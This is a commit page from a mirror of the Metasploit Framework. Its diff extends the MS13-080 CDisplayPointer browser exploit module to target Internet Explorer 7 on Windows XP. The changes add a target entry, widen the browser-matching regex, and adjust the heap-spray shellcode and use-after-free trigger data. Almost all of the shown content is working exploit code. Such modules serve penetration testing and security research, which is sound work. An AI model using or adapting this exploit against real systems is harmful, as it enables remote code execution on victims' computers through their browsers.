infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2530 - Add IE7 support for MS13-080 

by egypt
bug/bundler_fix
sinn3r 2013-10-16 16:42:00 -05:00
parent 721ce8f6b7 0ce221274b
commit 855d183926
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 12 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
View File

@ -66,8 +66,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 7 on Windows XP SP3', {} ],
[ 'IE 8 on Windows XP SP3', {} ],
[ 'IE 8 on Windows 7', {} ]
[ 'IE 8 on Windows 7', {} ],
],
'Payload' =>
{
@ -121,7 +122,7 @@ function dll() {
}
window.onload = function() {
window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
window.location = "#{get_uri.chomp("/")}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
}
</script>
</html>
@ -204,11 +205,16 @@ window.onload = function() {
rop_payload
end
#
# IE 6's call is at 6
# IE 8's call is at 7
# Don't think this one triggers on IE9
#
def get_sploit_html(target_info)
os = target_info[:os]
js_payload = ''
if os =~ /Windows (7|XP) MSIE 8\.0/
if os =~ /Windows (7|XP) MSIE [78]\.0/
js_payload = Rex::Text.to_unescape(get_payload(target_info))
else
print_error("Target not supported by this attack.")
@ -224,8 +230,9 @@ sprayHeap({shellcode:unescape("#{js_payload}")});
var earth = document;
var data = "";
for (i=0; i<17; i++) {
if (i==7) { data += unescape("%u2020%u2030"); }
else { data += "\\u4141\\u4141"; }
if (i==6) { data += unescape("%u2020%u2030"); }
else if (i==7) { data += unescape("%u2020%u2030"); }
else { data += unescape("%u4141%u4141"); }
}
data += "\\u4141";